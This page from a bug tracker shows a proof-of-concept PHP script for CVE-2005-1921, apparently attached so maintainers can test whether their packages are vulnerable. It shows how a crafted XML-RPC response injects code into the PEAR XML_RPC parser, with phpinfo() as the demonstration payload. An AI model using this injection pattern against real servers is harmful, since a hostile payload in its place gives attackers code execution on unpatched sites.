Bugzilla – Attachment 41293 Details for
Bug 94579
VUL-0: CVE-2005-1921: php XML RPC code injection
Home
|
New
|
Browse
|
Search
|
[?]
|
Reports
|
Requests
|
IDP Log In
|
Forgot Password
run with "php CAN-2005-1921-exploit.php"
CAN-2005-1921-exploit.php (text/plain), 455 bytes, created by
Ludwig Nussel
on 2005-07-07 08:13:51 UTC
(
hide
)
Description:
run with "php CAN-2005-1921-exploit.php"
Filename:
MIME Type:
Creator:
Ludwig Nussel
Created:
2005-07-07 08:13:51 UTC
Size:
455 bytes
patch
obsolete
>#!/usr/bin/php ><?php >require_once "PEAR.php"; >require_once "XML/RPC.php"; > >$p = new XML_RPC_Message("foo"); >$e = $p->parseResponse("<?xml version=\"1.0\"?> ><methodResponse> ><params> ><param> ><value> ><struct> ><member><name>','')); phpinfo(); die(); //</name><value></value></member> ></struct> ></value> ></param> ></params> ></methodResponse>"); >if ($e->faultCode()) { > printf("error message: %s\n", $e->faultString()); >} else { > print "no error\n"; >} >?>
<b>You cannot view the attachment while viewing its details because your browser does not support IFRAMEs. <a href="attachment.cgi?id=41293">View the attachment on a separate page</a>.</b>
Actions:
View
Attachments on
bug 94579
:
40437
| 41293